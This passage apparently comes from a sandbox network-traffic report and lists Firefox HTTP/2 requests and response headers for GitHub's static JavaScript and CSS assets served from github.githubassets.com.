                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:16 GMT
                          etag: "0x8DD15445FBEF8D2"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kiad7000052-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 32, 15265
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6f88b2159d2d3262c73b373ef75e87a545cbdf82
                          content-length: 9716
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD1544602C817F"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kjyo7100132-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 15210
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 714e9253afbb14bfcd68d3ccdc68d991d83bbad3
                          content-length: 5120
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 14:39:55 GMT
                          etag: "0x8DD0327E025E5FB"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kcgs7200172-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 31, 15070
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 517f4218e1089e3cebd9fc2b98ac2334fa4dec3d
                          content-length: 3077
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/notifications-subscriptions-menu-903735ea697a.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/notifications-subscriptions-menu-903735ea697a.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:16 GMT
                          etag: "0x8DD34DA6585FAFC"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932131
                          x-served-by: cache-iad-kiad7000158-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 21, 12642
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: f2ff7917d150522a9cd888948efd68a43ff79b2b
                          content-length: 5398
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/primer-react.69af3536c032f5d7cd94.module.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/primer-react.69af3536c032f5d7cd94.module.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Wed, 22 Jan 2025 22:08:34 GMT
                          etag: "0x8DD3B315084B67B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 324340
                          x-served-by: cache-iad-kcgs7200062-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 74, 10733
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: adb1078b4a2e642f240eb12851ab6b1e5b772f79
                          content-length: 21338
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Mon, 26 Aug 2024 16:36:17 GMT
                          etag: "0x8DCC5ED35736954"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 6573912
                          x-served-by: cache-iad-kjyo7100115-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 32, 11435
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 76bce4ae4387947b2673064bc10aaf184ae11a5a
                          content-length: 479
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-a706a57c5626.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_ui-commands_ui-commands_ts-a706a57c5626.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Wed, 22 Jan 2025 18:54:27 GMT
                          etag: "0x8DD3B16321FA579"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 339560
                          x-served-by: cache-iad-kcgs7200118-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 8, 11217
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 98a1881fad85720f4b9d11fc4cdff1e73e7fca8d
                          content-length: 6387
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/keyboard-shortcuts-dialog-02a61356799a.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/keyboard-shortcuts-dialog-02a61356799a.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:11 GMT
                          etag: "0x8DD34DA6270E58F"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200096-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16522
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 3fe918070a0c138f3c30387361bebf434d5c5bd3
                          content-length: 6201
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD1544602C33B7"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kjyo7100030-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 64, 13030
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: df64cc6a741b87312a8f15fe90bd3f8bd61da12a
                          content-length: 5246
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/sessions-4f48836d3e05.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/sessions-4f48836d3e05.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:23 GMT
                          etag: "0x8DD34DA697193FB"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932117
                          x-served-by: cache-iad-kcgs7200044-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 131, 14045
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: ad81143a4aa0d22afc05254675b9e814ea3acaf3
                          content-length: 4150
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 14:39:52 GMT
                          etag: "0x8DD0327DE7A8BE3"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2954340
                          x-served-by: cache-iad-kiad7000107-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 11461
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 62820571ea7a892b6b31e195ec800cc41e72d29b
                          content-length: 8037
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 14:39:55 GMT
                          etag: "0x8DD0327E029647C"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 2939099
                          x-served-by: cache-iad-kcgs7200065-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 9104
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: b2a0262194c4764a44a3ad56a7a4b813ebea1ff6
                          content-length: 3412
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-9909ff6aa778.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-9909ff6aa778.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 01:08:42 GMT
                          etag: "0x8DD35CA51C83666"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932131
                          x-served-by: cache-iad-kjyo7100112-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 36, 12911
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 692f4144e9c9cd956bb2adb0d70c402931831408
                          content-length: 3126
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_paths_index_ts-b6d716a998b0.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_paths_index_ts-b6d716a998b0.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Sat, 25 Jan 2025 00:10:34 GMT
                          etag: "0x8DD3CD4B007AF8B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 232542
                          x-served-by: cache-iad-kcgs7200074-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 72, 7178
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d0fbf989595b5795c2a1cf4d09de9378932196b0
                          content-length: 5945
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:27 GMT
                          etag: "0x8DD34DA6BC936F5"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932130
                          x-served-by: cache-iad-kiad7000179-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 24, 10565
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 62795acb736e2bc4397d6b6ec4fdb67e8e057dbb
                          content-length: 6371
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 24 Jan 2025 09:19:32 GMT
                          etag: "0x8DD3C5836BDCB3D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 280413
                          x-served-by: cache-iad-kjyo7100071-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 7, 1977
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: fccd2904fcf3647b2f0da2a05c4f6b75be79215f
                          content-length: 5699
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 23 Jan 2025 07:52:21 GMT
                          etag: "0x8DD3B82DDF06B6B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 280413
                          x-served-by: cache-iad-kiad7000096-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 7, 1964
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 7bbaa8ee9085c86b688df62ad22b768a5e557319
                          content-length: 19065
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/repos-overview-aed28e5cf7eb.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/repos-overview-aed28e5cf7eb.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 24 Jan 2025 09:19:32 GMT
                          etag: "0x8DD3C58367222F5"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 280413
                          x-served-by: cache-iad-kjyo7100174-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 6, 1726
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 36dfe38980b91f446cb53bfbe9e44acdbcb5a510
                          content-length: 22515
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/repos-overview.32a87dc4587d56dcf1eb.module.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/repos-overview.32a87dc4587d56dcf1eb.module.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Wed, 15 Jan 2025 20:57:17 GMT
                          etag: "0x8DD35A73225FB56"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 520345
                          x-served-by: cache-iad-kiad7000054-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 7, 9682
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 5d406374c29c7b8be97fa2e9c6dd8fd28f961d95
                          content-length: 341
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-3663c076188e.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-app_components_primer_experimental_select-panel-element_ts-3663c076188e.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 01:08:23 GMT
                          etag: "0x8DD35CA46149BF7"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kjyo7100088-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15679
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6b6a74fc467f9d7f34046f88de92167da9c5c3e8
                          content-length: 7758
                        • flag-us
                          GET
